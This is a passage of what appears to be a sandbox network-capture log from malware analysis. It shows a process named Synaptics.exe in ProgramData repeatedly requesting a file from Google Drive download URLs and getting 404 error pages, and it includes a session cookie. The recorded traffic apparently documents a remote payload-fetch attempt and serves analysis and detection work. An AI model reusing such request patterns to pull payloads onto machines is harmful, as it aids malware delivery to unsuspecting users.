  Cookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP
2024-12-30 10:25:27 UTC | 1250 | IN | HTTP/1.1 404 Not Found
  X-GUploader-UploadID: AFiumC6I5LGRmxxBcb7aYkVcEiGT5uDazQlk-Qq4tMReKqVC1LnDYVsSfdILU_vwfQykDLIYhNB3Qfg
  Content-Type: text/html; charset=utf-8
  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
  Pragma: no-cache
  Expires: Mon, 01 Jan 1990 00:00:00 GMT
  Date: Mon, 30 Dec 2024 10:25:27 GMT
  Cross-Origin-Opener-Policy: same-origin
  Content-Security-Policy: script-src 'report-sample' 'nonce-O1rmXFS9PWgDEYk2PmgXQA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
  Content-Length: 1652
  Server: UploadServer
  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  Content-Security-Policy: sandbox allow-scripts
  Connection: close
2024-12-30 10:25:27 UTC | 140 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:25:27 UTC | 1390 | IN | Data Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 52 36 4c 7a 57 65 35 4f 4a 79 44 7a 64 55 42 52 43 4a 68 47 6c 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
  Data Ascii: 404 (Not Found)!!1</title><style nonce="R6LzWe5OJyDzdUBRCJhGlw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:25:27 UTC | 122 | IN | Data Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
  Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.8 | 49751 | 216.58.206.46 | 443 | 6892 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:28 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
  User-Agent: Synaptics.exe
  Host: docs.google.com
  Cache-Control: no-cache
2024-12-30 10:25:28 UTC | 1314 | IN | HTTP/1.1 303 See Other
  Content-Type: application/binary
  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
  Pragma: no-cache
  Expires: Mon, 01 Jan 1990 00:00:00 GMT
  Date: Mon, 30 Dec 2024 10:25:28 GMT
  Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
  Strict-Transport-Security: max-age=31536000
  Content-Security-Policy: script-src 'report-sample' 'nonce-6DLupfvH0ebPrIg1Hb3Yrw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
  Cross-Origin-Opener-Policy: same-origin
  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
  Server: ESF
  Content-Length: 0
  X-XSS-Protection: 0
  X-Frame-Options: SAMEORIGIN
  X-Content-Type-Options: nosniff
  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.8 | 49750 | 216.58.206.46 | 443 | 6892 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:28 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
  User-Agent: Synaptics.exe
  Host: docs.google.com
  Cache-Control: no-cache
2024-12-30 10:25:28 UTC | 1314 | IN | HTTP/1.1 303 See Other
  Content-Type: application/binary
  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
  Pragma: no-cache
  Expires: Mon, 01 Jan 1990 00:00:00 GMT
  Date: Mon, 30 Dec 2024 10:25:28 GMT
  Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
  Strict-Transport-Security: max-age=31536000
  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
  Cross-Origin-Opener-Policy: same-origin
  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
  Content-Security-Policy: script-src 'report-sample' 'nonce-tZyAl7mdv1gdWOoa5pn0sg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
  Server: ESF
  Content-Length: 0
  X-XSS-Protection: 0
  X-Frame-Options: SAMEORIGIN
  X-Content-Type-Options: nosniff
  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.8 | 49752 | 172.217.16.193 | 443 | 6892 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:28 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
  User-Agent: Synaptics.exe
  Cache-Control: no-cache
  Host: drive.usercontent.google.com
  Connection: Keep-Alive
  Cookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP
2024-12-30 10:25:28 UTC | 1250 | IN | HTTP/1.1 404 Not Found
  X-GUploader-UploadID: AFiumC75Sb2YdE01qEoYtK-CGmnrtJ5ZypjeEIaAX5oTTwQ5w1htS722y4P4LVM_DCXq4L71fgwo4D4
  Content-Type: text/html; charset=utf-8
  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
  Pragma: no-cache
  Expires: Mon, 01 Jan 1990 00:00:00 GMT
  Date: Mon, 30 Dec 2024 10:25:28 GMT
  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
  Content-Security-Policy: script-src 'report-sample' 'nonce-lXMAAz3TH2MTVRPmI9OivA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
  Cross-Origin-Opener-Policy: same-origin
  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
  Content-Length: 1652
  Server: UploadServer
  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  Content-Security-Policy: sandbox allow-scripts
  Connection: close
2024-12-30 10:25:28 UTC | 140 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:25:28 UTC | 1390 | IN | Data Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 61 32 37 5a 39 63 4c 75 31 62 71 67 72 77 6c 65 42 43 5a 4d 65 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
  Data Ascii: 404 (Not Found)!!1</title><style nonce="a27Z9cLu1bqgrwleBCZMeQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:25:28 UTC | 122 | IN | Data Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
  Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.8 | 49753 | 172.217.16.193 | 443 | 6892 | C:\ProgramData\Synaptics\Synaptics.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:28 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
    Cookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP
2024-12-30 10:25:28 UTC | 1250 | IN | HTTP/1.1 404 Not Found
    X-GUploader-UploadID: AFiumC72KVF_rzGcV1BOzqPIc5yLiZ9x2ybgmT-EA6iY7uwbUVwKHYtsapCg_6v0eX6f-9yAW8hC8Y0
    Content-Type: text/html; charset=utf-8
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 30 Dec 2024 10:25:28 GMT
    Cross-Origin-Opener-Policy: same-origin
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy: script-src 'report-sample' 'nonce-wVVi4nQAcndS3W-7DrWy2Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Length: 1652
    Server: UploadServer
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Content-Security-Policy: sandbox allow-scripts
    Connection: close
2024-12-30 10:25:28 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:25:28 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="FV-QYT6fMZa8-EGYhmfebQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:25:28 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.8 | 49754 | 216.58.206.46 | 443 | 6892 | C:\ProgramData\Synaptics\Synaptics.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:29 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Host: docs.google.com
    Cache-Control: no-cache
2024-12-30 10:25:29 UTC | 1314 | IN | HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 30 Dec 2024 10:25:29 GMT
    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    Strict-Transport-Security: max-age=31536000
    Content-Security-Policy: script-src 'report-sample' 'nonce-JK43WesTCta4Zazem5djGw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Cross-Origin-Opener-Policy: same-origin
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.8 | 49757 | 172.217.16.193 | 443 | 6892 | C:\ProgramData\Synaptics\Synaptics.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:29 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
    Cookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP
2024-12-30 10:25:29 UTC | 1243 | IN | HTTP/1.1 404 Not Found
    X-GUploader-UploadID: AFiumC5rO2k5PgJK2itYWkF34TGGYQ9c1iOcnxYJYoTJy-6kNJ9FHgFB-HGYBi4hTE84CPCh
    Content-Type: text/html; charset=utf-8
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 30 Dec 2024 10:25:29 GMT
    Cross-Origin-Opener-Policy: same-origin
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy: script-src 'report-sample' 'nonce-zaRp3pI2J5oDpJcEl7ow0g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Length: 1652
    Server: UploadServer
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Content-Security-Policy: sandbox allow-scripts
    Connection: close
2024-12-30 10:25:29 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:25:29 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="Eav3Q0JfaBR5RJTv06AI5Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:25:29 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.8 | 49756 | 216.58.206.46 | 443 | 6892 | C:\ProgramData\Synaptics\Synaptics.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:29 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Host: docs.google.com
    Cache-Control: no-cache
2024-12-30 10:25:29 UTC | 1314 | IN | HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 30 Dec 2024 10:25:29 GMT
    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    Strict-Transport-Security: max-age=31536000
    Content-Security-Policy: script-src 'report-sample' 'nonce-bNXsIA1ONP1eclP_GVy1Xg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Cross-Origin-Opener-Policy: same-origin
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.8 | 49760 | 172.217.16.193 | 443 | 6892 | C:\ProgramData\Synaptics\Synaptics.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:29 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
    Cookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP
2024-12-30 10:25:29 UTC | 1250 | IN | HTTP/1.1 404 Not Found
    X-GUploader-UploadID: AFiumC4zg4AQd-u56P6ySOM_rnyBmXpvD8v0hAfyJ4s99l9j9G7WaxB4m046OvnFJnB05sA8o3WUfM0
    Content-Type: text/html; charset=utf-8
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 30 Dec 2024 10:25:29 GMT
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Content-Security-Policy: script-src 'report-sample' 'nonce-NHUZSGUkvtQHnffHXaVdKA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Cross-Origin-Opener-Policy: same-origin
    Content-Length: 1652
    Server: UploadServer
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Content-Security-Policy: sandbox allow-scripts
    Connection: close
2024-12-30 10:25:29 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:25:29 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="IKdZHJmWnMymnn-nyViSyg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:25:29 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
28          192.168.2.8  49762        216.58.206.46   443               6892  C:\ProgramData\Synaptics\Synaptics.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-30 10:25:30 UTC  143                OUT        GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Host: docs.google.com
    Cache-Control: no-cache


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
29          192.168.2.8  49768        216.58.206.46   443               6892  C:\ProgramData\Synaptics\Synaptics.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-30 10:25:30 UTC  143                OUT        GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Host: docs.google.com
    Cache-Control: no-cache
2024-12-30 10:25:31 UTC  1314               IN         HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 30 Dec 2024 10:25:31 GMT
    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    Strict-Transport-Security: max-age=31536000
    Content-Security-Policy: script-src 'report-sample' 'nonce-vP852-jv0bqtO3F4CjFYKA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Cross-Origin-Opener-Policy: same-origin
